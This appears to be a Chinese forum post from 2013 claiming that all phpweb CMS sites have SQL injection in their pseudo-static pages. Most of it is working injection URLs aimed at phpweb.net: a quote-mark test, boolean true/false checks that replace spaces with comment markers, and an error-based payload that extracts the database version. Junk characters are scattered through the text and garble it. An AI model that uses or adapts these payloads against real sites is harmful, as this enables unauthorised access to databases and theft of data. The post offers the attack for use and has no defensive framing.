phpweb所有的整站程序伪静态页面都存在sql注入% ^7 ^; w) g) m- g1 h9 X% y2 w
! n+ G7 O9 F; L
主站:http://phpweb.net/
0 V+ }3 a8 Z: H" B; K6 w加’检测:. u. r* e- ~& f. Z: e2 F1 s* N
2 s1 i3 M; i" K( @ {http://www.phpweb.net/down/html/?772′.html
* n: J7 I/ S1 Y* \* h6 q
3 D/ l/ ?$ @* O) g7 k( o, W出错
6 I' o" ~) _( ?存在注入。& C! S7 ~9 d" n; S) j
不能用空格,只能用/*罗7 f& {4 J' w" |+ ~8 U! e
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
8 W ]/ ?/ X# V, b. J: ]* Z
. t% T4 Q9 i: o' E) d2 Z) Z$ r: Fhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
% O K$ {5 N6 {2 g0 }7 I爆数据库版本:
2 D" x) A' M8 v6 h e
! r! ]" P/ q: Z8 h6 I& b?" M, H8 P5 m* j; I. |8 S
1: l/ i" R4 I( o4 ^( |
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html4 I, \/ _9 e/ ~ M" f' k. T
更新日期: 2013-01-03 13:39:50 $ h' O7 b" R) ], S3 H
|